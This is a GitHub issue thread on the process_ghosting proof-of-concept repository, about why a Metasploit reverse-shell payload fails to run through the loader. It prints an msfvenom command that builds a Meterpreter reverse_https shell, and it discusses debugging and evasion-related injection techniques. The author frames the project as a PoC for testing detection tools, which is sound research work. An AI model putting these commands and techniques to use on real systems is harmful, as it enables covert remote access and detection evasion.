process_ghosting icon indicating copy to clipboard operation
process_ghosting copied to clipboard
verified publisher icon hasherezade

Payload doens't fire

Open hawaii67 opened this issue 4 years ago • 11 comments

I created a reverse shell with msfvenom, precisely an exe file, but it won't fire:

'E:\process_ghosting-master\Debug>proc_ghost.exe msf_rev_https.exe
[+] Created temp file: C:\Users\fancy\AppData\Local\Temp\THCFE8.tmp [+] Information set [+] Written! PEB address: 2d7000 ImageBase address: 140000000 [+] Parameters mapped! PEB address: 2d7000 PEB address: 2d7000 ProcessParameters addr: 0000025FD11A8F30 [+] Process created! Pid = 31e0 EntryPoint at: 140004000 [+] Done!'

The process is created and disappears after a few seconds.

The file msf_rev_https.exe works fine btw.

hawaii67 avatar Jun 18 '21 12:06 hawaii67

so, the payload runs and terminates? or it crashes? try to debug it and see what is happening inside the payload, maybe it was not able to open a socket or so, and just exited. if it was able to run even for a moment, it means it is not an issue with the loader.

hasherezade avatar Jun 18 '21 12:06 hasherezade

The payload ist just doing nothing. I tried to debug of course but I cannot attach to the newly generated process. Error message by X64dbg:

Debugging finished! Could not get file name from module 2a10!

where 2a10 is the process id

hawaii67 avatar Jun 18 '21 14:06 hawaii67

please share the payload, and I will test what exactly is going on...

hasherezade avatar Jun 18 '21 15:06 hasherezade

Well, I just used a simple msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<ip> LPORT=443 -f exe to generate the payload.

PS: Trying with a GUI program as payload like winobj64.exe, it works fine. Using procexp64.exe generates an error message:

grafik

Sp obviously the "payload" should fullfill certain criterias............

hawaii67 avatar Jun 22 '21 05:06 hawaii67

ok, so first of all, regarding the attaching to the child process:

The payload ist just doing nothing. I tried to debug of course but I cannot attach to the newly generated process. Error message by X64dbg:

Debugging finished! Could not get file name from module 2a10!

where 2a10 is the process id

Indeed in case of this technique, as well as in Doppelganging x64dbg does not allow to attach at this stage (before the first thread is run).

But there is a workaround for this, that I helped me debug such processes:

  • you need to patch the entry point of the payload: copy two bytes that were at the beginning, and then overwrite them with EB FE (jump to the current line). Thanks to this, you can run the process, but the execution won't go any further.
  • run the payload via Ghosting/Doppelganging.
  • attach the debugger to the newly created process with the payload.
  • Break the execution.
  • Go to the Entry Point. Replace the EB FE with the original bytes that you copied in the first step. Set the breakpoint after the replaced code.
  • Resume it.

That's how you can follow the execution further.

hasherezade avatar Jun 23 '21 07:06 hasherezade

PS: Trying with a GUI program as payload like winobj64.exe, it works fine. Using procexp64.exe generates an error message:

grafik

Sp obviously the "payload" should fullfill certain criterias............

This technique, as well as Doppelganging requires manual setup of the full process environment, and many parameters manually: https://github.com/hasherezade/process_ghosting/blob/master/main.cpp#L158 It is quite tedious to implement, and my goal was just to make a PoC on which the detection tools can be tested, so I implemented a minimalist version, without trying to cover all the possible scenarios. It is very much possible that this will cause issues with some payloads, but currently I have other priorities and no time to dedicate making it bulletproof. Feel free to build upon my base and extend it.

hasherezade avatar Jun 23 '21 08:06 hasherezade

Thanks for the hints and taking the time to answer. I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

hawaii67 avatar Jun 23 '21 08:06 hawaii67

You are welcome, when I will get some free time I will see in details what is missing for this payload to execute completely.

BTW - check also transacted_hollowing - recently I implemented a version that is like a merge with Process Ghosting - uses delete-pending file instead of a transacted file.

https://github.com/hasherezade/transacted_hollowing/blob/main/main.cpp#L14

You can choose which version to build by using a CMake flag:

ghosting_flag

hasherezade avatar Jun 23 '21 12:06 hasherezade

Thanks a lot, transacted_hollowing works like a charm! Awesome work !

hawaii67 avatar Jun 23 '21 17:06 hawaii67

Thanks for the hints and taking the time to answer. I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

I've had the same problem, but I can't run after I change the process information, and can tell me which one you changed :)

knightswd avatar Aug 25 '21 16:08 knightswd

Thanks for the hints and taking the time to answer. I already used the EB FE trick and I could follow the whole process in X64dbg. You are right, some parameters have to be set manually. Thanks again, especially for this great PoC.

I changed RtlCreateProcessParametersEX() parameters, but It's not work

knightswd avatar Aug 26 '21 02:08 knightswd